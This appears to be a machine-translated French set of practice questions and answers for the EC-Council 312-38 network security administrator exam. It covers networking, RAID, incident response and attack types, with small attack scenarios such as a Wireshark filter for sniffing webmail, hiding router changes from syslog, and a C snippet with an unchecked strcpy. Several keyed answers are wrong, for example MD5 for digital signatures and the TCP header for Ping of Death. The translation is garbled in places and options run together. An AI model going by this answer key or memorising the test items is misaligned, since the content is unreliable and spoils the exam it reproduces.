signaux parasites émis par les équipements électriques du système?
Sécurité physique
Sécurité d'émanation
Sécurité des communications
Sécurité du matériel

Réponse: Emanation Security

Lequel des types de cyberharcèlement suivants nuit à la réputation de leur victime et retourne d'autres
personnes contre eux en créant leurs propres sites Web, blogs ou pages utilisateur à cet effet?
Fausse victimisation

Fausse accusation

Encourager les autres à harceler la victime

Tentatives de recueillir des informations sur la victime

Réponse: Fausse accusation


Lesquelles des adresses de classe IP suivantes ne sont pas attribuées aux hôtes? Chaque réponse correcte
représente une solution complète. Choisissez tout ce qui correspond

Classe A

Classe B

Classe E

Classe D

Réponse: Classe E Classe D

Lesquelles des affirmations suivantes sont vraies concernant la mémoire volatile? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations stockées. Le

contenu est stocké en permanence et même l'alimentation est coupée.

La mémoire morte (ROM) est un exemple de mémoire volatile.

Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de données.

Réponse: C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations
stockées. Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de données.

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 17/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7
Parmi les périphériques réseau suivants, lesquels fonctionnent sur la couche réseau du
modèle OSI? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui
correspond.
Répétiteur

Routeur

Pont

Passerelle

Réponse: Router Gateway

Laquelle des couches OSI suivantes établit, gère et met fin aux connexions entre les applications locales et
distantes?
Couche de session

Couche d'application

Couche réseau

Couche de liaison de données

Réponse: couche de session

Lequel des types de RAID suivants n'offre aucune protection pour le disque de parité?

RAID 3

RAID 5

RAID 2

RAID 1

Réponse: RAID 3

Lequel des éléments suivants est une implémentation open source du protocole syslog pour Unix?
syslog-ng

Unix-syslog

syslog Unix

syslog-os

Réponse: syslog-ng
Laquelle des organisations suivantes est responsable de la gestion de l'attribution des noms de domaine et
des adresses IP?
ANSI

ICANN W3C

ISO

Réponse: ICANN

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 18/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Lequel des protocoles suivants est une version plus sécurisée du protocole PPTP (Point-to-Point Tunneling
Protocol) et assure la tunnellisation, l'attribution d'adresses et l'authentification?

DHCP

PPP

IP

L2TP

Réponse: L2TP
La sécurité du réseau est le domaine spécialisé, qui comprend les dispositions et politiques adoptées par
l'administrateur réseau pour empêcher et surveiller l'accès non autorisé, l'utilisation abusive, la
modification ou le refus du réseau informatique et des ressources accessibles par le réseau. Pour laquelle des
raisons suivantes la sécurité du réseau est-elle nécessaire? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond

Pour protéger les informations contre la perte et les livrer correctement à destination

Pour protéger les informations contre les modifications indésirables, accidentelles ou intentionnelles par des utilisateurs
non autorisés

Pour protéger les informations privées sur Internet

Pour empêcher un utilisateur d'envoyer un message à un autre utilisateur avec le nom d'une troisième personne

Réponse: Pour protéger les informations contre la perte et les livrer correctement à leur destination Pour protéger
les informations contre les modifications indésirables, accidentelles ou intentionnelles par des utilisateurs non
autorisés Pour protéger les informations privées sur Internet Pour empêcher un utilisateur d'envoyer un message
à un autre utilisateur avec le nom d'un à la troisième personne

Adam, un pirate malveillant, renifle un réseau Wi-Fi non protégé situé dans un magasin local avec
Wireshark pour capturer le trafic de messagerie Hotmail. Il sait que de nombreuses personnes utilisent leur
ordinateur portable pour naviguer sur le Web dans le magasin. Adam veut renifler leurs e-mails traversant
le réseau Wi-Fi non protégé. Lequel des filtres Wireshark suivants Adam configurera-t-il pour afficher
uniquement les paquets contenant des messages électroniques hotmail?
(http = "login.passport.com") && (http contient "POP3")

(http contient "email") && (http contient "hotmail")

(http = "login.pass.com") && (http contient "SMTP")

(http contient "hotmail") && (http contient "Reply-To")

Réponse: (http contient "hotmail") && (http contient "Reply-To")


Qu'est-ce que c'est?
Un virus

Un IDS réactif.

Un pot de miel

Un virus polymorphe

Réponse: un pot de miel


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 19/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Lequel des énoncés suivants est un processus de transformation où l'ancien système ne peut plus être
maintenu?
Risque

Menace

Catastrophe

Crise

Réponse: crise

Dans un réseau Ethernet poste à poste, lequel des câbles suivants est utilisé pour connecter deux
ordinateurs, à l'aide de connecteurs RJ-45 et d'un câble UTP de catégorie 5?
Parallèle

En série

Crossover

Loopback

Réponse: Crossover

Lesquels des protocoles de routage à vecteur de distance sont les suivants? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

IS-IS

IGRP RIP

OSPF

Réponse: IGRP RIP


Lequel des éléments suivants est un outil Unix et Windows capable d'intercepter le trafic sur un segment de
réseau et de capturer le nom d'utilisateur et le mot de passe?

Aircrack

Ettercap

AirSnort

BackTrack

Réponse: Ettercap

Adam, un pirate malveillant, vient de réussir à voler un cookie sécurisé via une attaque XSS. Il est capable
de rejouer le cookie même lorsque la session est valide sur le serveur. Laquelle des raisons suivantes est la
raison la plus probable de cette cause?

Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique).

Un cryptage bidirectionnel est appliqué.

Aucun cryptage n'est appliqué.

Le chiffrement est effectué au niveau de la couche réseau (chiffrement de couche 1).

Réponse: Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique).
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 20/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

Lequel des ensembles de pratiques de réponse aux incidents suivants est recommandé par le CERT / CC?

Préparer, gérer et notifier

Préparer, notifier et assurer le suivi

Informer, gérer et assurer le suivi

Préparer, gérer et assurer le suivi

Réponse: préparer, gérer et assurer le suivi


Lequel des éléments suivants est une collection centralisée de pots de miel et d'outils d'analyse?
Honeyfarm

Honeynet

Pot de miel de recherche

Pot de miel de production

Réponse: Honeyfarm

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-6 21/10
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7

ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA)


Set d'examen 8
Laquelle des phases suivantes est la première étape vers la création d'un plan de continuité des activités?

Élaboration d'un plan de continuité des activités

Évaluation de l'impact sur les entreprises

Étendue et lancement du plan

Approbation et mise en œuvre du plan

Réponse: portée et lancement du plan


Laquelle des organisations suivantes est une organisation à but non lucratif qui supervise l'allocation des
adresses IP, la gestion de l'infrastructure DNS, l'attribution des paramètres de protocole et la gestion du
système du serveur racine?

ICANN

IEEE

ANSI

UIT

Réponse: ICANN
Laquelle des politiques suivantes aide à définir ce que les utilisateurs peuvent et doivent faire pour utiliser
l'équipement informatique du réseau et de l'organisation?

Politique d'accès à distance

Politique informatique

Politique d'utilisation

Politique générale

Réponse: politique de l'utilisateur

Lequel des types de transmission suivants consiste à envoyer un bit à la fois sur une seule ligne de
transmission?
Transmission de données en série

Transmission multidiffusion

Transmission unicast

Transmission de données parallèle

Réponse: transmission de données en série

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 22
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7
Laquelle des normes suivantes est une modification de l'IEEE 802.11 d'origine et spécifie les mécanismes de
sécurité pour les réseaux sans fil?

802.11b

802.11e

802.11a

802.11i

Réponse: 802.11i
Lequel des éléments suivants est un appareil de la taille d'une carte de crédit utilisé pour stocker en toute
sécurité des informations personnelles et utilisé conjointement avec un code PIN pour authentifier les
utilisateurs?

Carte Java

Carte de proximité

Carte à puce

carte SD

Réponse: carte à puce

Lequel des plans suivants est documenté et organisé pour les interventions d'urgence, les opérations de
sauvegarde et la restauration maintenues par une activité dans le cadre de son programme de sécurité qui
garantira la disponibilité des ressources critiques et facilitera la continuité des opérations dans une situation
d'urgence?

Plan de reprise après sinistre

Plan de continuité des activités


Plan de continuité des opérations

Plan d'urgence

Réponse: Plan d'urgence

Parmi les représentants suivants du processus de réponse aux incidents, lesquels sont inclus dans l'équipe de
réponse aux incidents? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui
correspond.

Représentant légal

Représentant en sécurité de l'information

Représentant technique

Ressources humaines

Enquêteur principal

Réponse: Représentant légal Représentant en sécurité de l'information Représentant technique Ressources


humaines Enquêteur principal

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 23
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens d'administrateur de sécurité de réseau (ENSA) 7
Lequel des éléments suivants est un outil d'analyse de réseau qui envoie des paquets avec des paramètres de
pile IP non traditionnels?
SAINT

Nessus

COPS

HPing

Réponse: HPing

Avec laquelle des formes suivantes d'accusé de réception l'expéditeur peut-il être informé par le destinataire
des données de tous les segments qui ont réussi?

Accusé de réception sélectif

Remerciements cumulatifs

Accusé de réception négatif

Accusé de réception de blocage

Réponse: reconnaissance sélective

Lesquels des éléments suivants fournissent un service d'accès Internet «toujours activé» lors de la connexion
à un FAI? Chaque bonne réponse représente une solution complète. Choisissez deux.
Modem numérique

Modem câble

Modem analogique

DSL

Réponse: modem câble DSL

Lequel des types de RAID suivants est également connu sous le nom de répartition par disque?

RAID 0

RAID 3

RAID 2

RAID 1

Réponse: RAID 0
Avec lequel des ensembles d'indicateurs suivants le scan d'arbre de Noël envoie-t-il une trame TCP à un
périphérique distant? Chaque bonne réponse représente une partie de la solution. Choisissez tout ce qui
correspond.
RST

FIN

PUSH

URG

Réponse: FIN PUSH URG

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 24
/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Laquelle des fonctionnalités clés suivantes est utilisée par TCP afin de réguler la quantité de données
envoyées par un hôte à un autre hôte du réseau?

Contrôle de la congestion

Contrôle de flux

Numéro de séquence

Horodatage TCP

Réponse: Contrôle de flux

Laquelle des métriques de routage suivantes représente la somme des coûts associés à chaque lien traversé?

Coût de communication

Bande passante

Retard d'acheminement

Longueur du chemin

Réponse: Longueur du chemin


Laquelle des couches suivantes du modèle TCP / IP est utilisée pour déplacer des paquets entre les
interfaces de la couche Internet de deux hôtes différents sur la même liaison?

Couche de transport

Couche d'application

Couche Internet

Couche de lien

Réponse: couche de liaison

Lequel des éléments suivants est une attaque contre un site Web qui modifie l'apparence visuelle du site et
porte gravement atteinte à la confiance et à la réputation du site Web?
Dégradation du site Web

Attaque Zero Day

Débordement de tampon

Usurpation d'identité

Réponse: Dégradation de site Web

Vous êtes administrateur d'un réseau dans une banque d'investissement. Vous êtes préoccupé par le fait que
des individus violent votre réseau et puissent voler des données avant de pouvoir détecter leur présence et
fermer leur accès. Lequel des éléments suivants est le meilleur moyen de résoudre ce problème?

Mettez en place un pot de miel.

Implémentez un antivirus basé sur le réseau.

Mettez en place un pare-feu solide.

Mettez en œuvre une politique de mot de passe solide.

Réponse: Mettez en place un pot de miel.


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 25
/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Peter, un pirate malveillant, obtient des adresses électroniques en les récupérant à partir de publications, de
blogs, de listes DNS et de pages Web. Il envoie ensuite un grand nombre de messages électroniques
commerciaux non sollicités (UCE) à ces adresses. Lequel des crimes par courrier électronique suivants est-il
en train de commettre?

Tempête d'e-mails

Usurpation d'identité par e-mail

Spam par e-mail

Bombardement par e-mail

Réponse: Spam par e-mail

Lequel des champs d'en-tête suivants dans les protocoles TCP / IP implique une attaque Ping of Death?

Champ d'en-tête IP

Champ d'en-tête TCP

Champ d'en-tête SMTP

Champ d'en-tête UDP

Réponse: champ d'en-tête TCP


Laquelle des politiques suivantes est un ensemble de règles conçues pour améliorer la sécurité informatique
en encourageant les utilisateurs à utiliser des mots de passe forts et à les utiliser correctement?
Politique de protection des informations

Stratégie de groupe

Politique d'accès à distance

Politique de mot de passe (correcte)

Réponse: politique de mot de passe

Lequel des énoncés suivants fait référence à l'exploitation d'une session informatique valide pour obtenir un
accès non autorisé à des informations ou des services dans un système informatique?
Hameçonnage

Usurpation d'identité

Schtroumpf

Détournement de session

Réponse: détournement de session

Laquelle des politiques suivantes est utilisée pour ajouter des informations supplémentaires sur la sécurité
globale et sert à protéger les employés et les organisations contre l'inefficacité ou l'ambiguïté?

Politique informatique

Politique d'utilisation

Stratégie de groupe

Politique de sécurité spécifique au problème (correcte)

Réponse: politique de sécurité spécifique au problème


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 26
/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Lequel des éléments suivants est le meilleur moyen de protéger les données importantes contre les attaques
de virus?
Prendre une sauvegarde quotidienne des données.

Mise à jour régulière du logiciel antivirus.

Implémentation d'un pare-feu.

Utiliser des mots de passe forts pour se connecter au réseau.

Réponse: mise à jour régulière du logiciel antivirus.


Lequel des éléments suivants est un protocole qui décrit une approche pour fournir une prise en charge
«rationalisée» des services d'application OSI au-dessus des réseaux TCP / IP pour certains environnements
contraints?
Protocole de conversation par relais Internet

Protocole de configuration d'hôte dynamique

Protocole de transfert de nouvelles réseau

Protocole de présentation léger

Réponse: Protocole de présentation léger

Lequel des éléments suivants est un réseau multi-accès distribué qui aide à prendre en charge les
communications intégrées à l'aide d'un bus double et d'une file d'attente distribuée?

Double bus à file d'attente distribuée

Contrôle de liaison logique

Réseau Token Ring

CSMA / CA

Réponse: bus double à file d'attente distribuée


Lequel des protocoles suivants permet aux utilisateurs d'entrer un nom d'ordinateur convivial dans le
navigateur Windows et de mapper les lecteurs réseau et d'afficher les dossiers partagés?

VoIP

NetBEUI

ARP

RAYON

Réponse: NetBEUI

Laquelle des attaques suivantes entre dans la catégorie d'une attaque active?

Rejouer l'attaque

Écoute passive

Empreinte sans fil

Analyse du trafic

Réponse: rejouer l'attaque

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 27
/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8
Laquelle des attaques suivantes combine des attaques par dictionnaire et des attaques par force brute?

Attaque hybride

Une attaque par phishing

Rejouer l'attaque

Attaque de l'homme du milieu

Réponse: attaque hybride


Lequel des éléments suivants est un type de VPN impliquant une seule passerelle VPN?

VPN basé sur intranet

VPN basé sur l'extranet VPN

d'accès à distance

VPN PPTP

Réponse: VPN basé sur l'extranet

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 28
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité


réseau (ENSA) 9
Laquelle des techniques suivantes est utilisée pour dessiner des symboles dans les lieux publics pour la
publicité d'un réseau sans fil Wi-Fi ouvert?

Numérotation de guerre

Warchalking

Conduite de guerre

Spamming

Réponse: Warchalking

Laquelle des pratiques suivantes consiste à envoyer des e-mails indésirables, souvent avec un contenu
commercial, en grande quantité à un ensemble de destinataires aveugles? Chaque bonne réponse représente
une solution complète. Choisissez tout ce qui correspond.

Usurpation d'adresse e-mail

Spam par e-mail

Courrier indésirable

Brouillage des e-mails

Réponse: Courriel indésirable Courrier indésirable


Lequel des appareils suivants permet aux appareils de communication sans fil de se connecter à un réseau
sans fil en utilisant le Wi-Fi, le Bluetooth ou des normes connexes?
Carte express
WAP
WNIC
Répéteur sans fil

Réponse: WAP

Adam travaille comme testeur de pénétration professionnel. Un projet lui a été assigné pour tester les
vulnérabilités du routeur CISCO d'Umbrella Inc. Adam découvre qu'il existe une vulnérabilité d'accès
arbitraire à la configuration HTTP dans le routeur. En appliquant différents outils de craquage de mot de
passe, Adam accède au routeur. Il analyse le fichier de configuration du routeur et remarque les lignes
suivantes: journalisation des erreurs tamponnées historique de la journalisation critiques des pièges de
journalisation avertissements journalisation 10.0.1.103 En analysant les lignes ci-dessus, Adam conclut que
ce routeur se connecte au niveau de journal 4 au serveur syslog 10.0.1.103. Il décide de changer le niveau de
journal de 4 à 0. Laquelle des raisons suivantes est la raison la plus probable de changer le niveau de
journal?
La modification du niveau de journalisation de 4 à 0 entraînera la fin de la journalisation. De cette façon, la
modification dans le routeur n'est pas envoyée au serveur syslog.

La modification du niveau de journalisation de 4 à 0 entraînera la journalisation des seules urgences. De cette façon, la
modification dans le routeur n'est pas envoyée au serveur syslog.
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 29
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

En modifiant le niveau de journalisation, Adam peut facilement effectuer une attaque par injection SQL.

La modification du niveau de journalisation accorde l'accès au routeur en tant qu'administrateur.

Réponse: la modification du niveau de journalisation de 4 à 0 entraînera la journalisation des seules


urgences. De cette façon, la modification dans le routeur n'est pas envoyée au serveur syslog.

Dans laquelle des conditions suivantes le système passe-t-il en mode moniteur ROM? Chaque bonne
réponse représente une solution complète. Choisissez tout ce qui correspond.
Le routeur ne trouve pas d'image de système d'exploitation valide.

Le routeur n'a pas de fichier de configuration.

L'utilisateur interrompt la séquence de démarrage.

Il est nécessaire de définir des paramètres de fonctionnement.

Réponse: Le routeur ne trouve pas d'image de système d'exploitation valide.L'utilisateur interrompt la


séquence de démarrage.

Lequel des éléments suivants est un outil qui s'exécute sur le système d'exploitation Windows et analyse les
messages du journal iptables pour détecter les analyses de port et tout autre trafic suspect?
PSAD

NetRanger

Nmap

Hping

Réponse: PSAD

Laquelle des procédures suivantes est conçue pour permettre au personnel de sécurité d'identifier,
d'atténuer et de récupérer des incidents informatiques malveillants, tels qu'un accès non autorisé à un
système ou à des données, un déni de service ou des modifications non autorisées du matériel, des logiciels
ou des données du système ?
Plan de reprise après sinistre

Plan d'urgence pour les occupants

Plan de communication de crise

Plan de réponse aux incidents cybernétiques

Réponse: Plan de réponse aux incidents cybernétiques

Adam travaille comme analyste de sécurité pour Umbrella Inc. La société possède un réseau basé sur Linux
comprenant un serveur Apache pour les applications Web. Il a reçu le journal de serveur Web Apache
suivant, qui est le suivant: [sam nov 16 14:32:52 2009] [erreur] [client 128.0.0.7] client refusé par la
configuration du serveur: / export / home / htdocs / test Le premier élément dans l'entrée de journal est la
date et l'heure du message de journal. La deuxième entrée détermine la gravité de l'erreur
signalée. Maintenant, Adam veut changer le niveau de gravité pour contrôler les types d'erreurs qui sont
envoyés au journal des erreurs. Laquelle des directives suivantes Adam utilisera-t-il pour accomplir la
tâche?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 30
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9
LogLevel
CustomLog

ErrorLog

LogFormat

Réponse: LogLevel

Parmi les éléments suivants, quels sont les problèmes de sécurité courants liés aux communications et aux e-
mails? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
Répudiation des messages

Modification du message

Écoute

Relecture du message

Usurpation d'identité

Faux message

Réponse: Répudiation du message Modification du message Écoute clandestine Lecture du message Vol
d'identité Faux message

Lequel des éléments suivants est un processus qui détecte un problème, détermine sa cause, minimise les
dommages, résout le problème et documente chaque étape de la réponse pour référence future?
La gestion des incidents

Traitement des incidents

Réponse à l'incident

Planification des incidents

Réponse: réponse aux incidents

Laquelle des techniques suivantes utilise un modem pour numériser automatiquement une liste de numéros
de téléphone?
Warchalking

Warkitting

Numérotation de guerre

Conduite de guerre

Réponse: composition de guerre

Parmi les techniques de chiffrement suivantes, lesquelles utilisent les signatures numériques?
Blowfish

IDÉE

MD5

RSA

Réponse: MD5

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 31
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9
Parmi les attaques suivantes, lesquelles sont des menaces informatiques qui tentent d'exploiter des
vulnérabilités d'applications informatiques inconnues des autres ou non dévoilées au développeur du
logiciel? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
Zero-day

Usurpation

Zéro heure

Débordement de tampon

Réponse: usurpation de zéro heure


Dans lequel des types de scans de ports suivants le scanneur tente-t-il de se connecter aux 65 535 ports?
UDP

Rebond FTP

Strobe

Vanille

Réponse: vanille

Lequel des protocoles suivants utilise un canal de contrôle sur TCP et un tunnel GRE fonctionnant pour
encapsuler les paquets PPP?
SSTP

ESP

PPTP

LWAPP

Réponse: PPTP
Lequel des éléments suivants est une architecture d'application distribuée qui répartit les tâches ou les
charges de travail entre les fournisseurs de services et les demandeurs de services? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.
Mise en réseau client-serveur

Réseautage poste à poste

Informatique client-serveur

Informatique peer-to-peer (P2P)

Réponse: Réseau client-serveur Informatique client-serveur

Lequel des services suivants est un service de télécommunication conçu pour une transmission de données
rentable pour le trafic intermittent entre les réseaux locaux (LAN) et entre les points d'extrémité d'un
réseau étendu (WAN)?
X.25 Relais de trame PPP RNIS

Réponse: relais de trame

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 32
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Lequel des éléments suivants est un champ 16 bits qui identifie le numéro de port source du programme
d'application dans l'hôte qui envoie le segment?
Numéro de séquence

Longueur d'en-tête

Adresse du port source Numéro

d'accusé de réception

Réponse: Adresse du port source


Lequel des dispositifs biométriques suivants est utilisé pour prendre des empreintes des arêtes de friction de
la peau sur le dessous du bout des doigts?
Caméra à iris

Dispositif de reconnaissance faciale

Empreinte vocale de reconnaissance vocale

Lecteur d'empreintes digitales

Réponse: lecteur d'empreintes digitales


Laquelle des topologies suivantes est un type de conception de réseau physique dans laquelle chaque
ordinateur du réseau est connecté à un périphérique central via un câble à paire torsadée non blindée
(UTP)?
Topologie en étoile Topologie

en anneau Topologie maillée

Topologie de bus

Réponse: Topologie en étoile

Lequel des éléments suivants est un protocole de découverte de services qui permet aux ordinateurs et
autres périphériques de trouver des services dans un réseau local sans configuration préalable?
SLP NNTP NTP DCAP

Réponse: SLP
Lequel des éléments suivants est un système de détection d'intrusion qui surveille et analyse les composants
internes d'un système informatique plutôt que les paquets réseau sur ses interfaces externes?
HIDS DMZ

NIDS

IPS

Réponse: HIDS
Lequel des éléments suivants est également appelé pare-feu avec état?

Pare-feu de filtrage de paquets dynamique DMZ

Pare-feu PIX

Pare-feu sans état

Réponse: Pare-feu de filtrage de paquets dynamique

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 33
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Lequel des éléments suivants est un pare-feu qui assure le suivi de l'état des connexions réseau qui le
traversent?
Pare-feu de passerelle d'application

Pare-feu de filtre de paquets sans état

Pare-feu proxy au niveau du circuit

Pare-feu dynamique

Réponse: Pare-feu dynamique

Lequel des protocoles suivants est utilisé pour échanger des informations de routage entre deux passerelles
dans un réseau de systèmes autonomes?
OSPF EGP IGMP ICMP

Réponse: EGP

Lequel des types de VPN suivants utilise Internet comme épine dorsale principale, permettant aux
utilisateurs, aux clients et aux succursales d'accéder aux ressources du réseau d'entreprise à travers diverses
architectures de réseau?
VPN PPTP

VPN basé sur l'extranet VPN

basé sur intranet

VPN d'accès à distance

Réponse: VPN basé sur l'extranet

John travaille comme programmeur C. Il développe le programme C suivant: #include #include #include
int buffer (char * str) {char buffer1 [10]; strcpy (buffer1, str); return 1;} int main (int argc, char * argv [])
{buffer (argv [1]); printf ("Exécuté \ n"); retour 1; } Son programme est vulnérable à une attaque
.
Déni de service

Débordement de tampon

Scriptage intersite

Injection SQL

Réponse: Buffer overflow

Lequel des éléments suivants est un réseau qui prend en charge les communications mobiles sur un nombre
arbitraire de réseaux locaux sans fil et de zones de couverture satellite?
BLÊME

LAN

GAN

HAN

Réponse: GAN

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 34
/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Lequel des éléments suivants est la forme complète de SAINT?


Outil réseau intégré de l'administrateur système

Outil de réseau intégré d'administration de sécurité

Outil réseau intégré des administrateurs système

Outil de réseau intégré automatisé par système

Réponse: Outil réseau intégré des administrateurs système

Jason travaille en tant qu'administrateur système pour www.company.com Inc. La société possède un
réseau Windows. Sam, un employé de l'entreprise, modifie accidentellement certaines applications et
certains paramètres système. Il se plaint à Jason que son système ne fonctionne pas correctement. Pour
résoudre le problème, Jason diagnostique les composants internes de son ordinateur et observe que
certaines modifications ont été apportées au registre informatique de Sam. Pour corriger le problème, Jason
doit restaurer le registre. Lequel des utilitaires suivants Jason peut-il utiliser pour accomplir la tâche? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
Event

CombMT Regedit.exe

Reg.exe

Registraire resplendissant

Réponse: Regedit.exe Reg.exe registraire resplendissant

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 35
/9

Vous aimerez peut-être aussi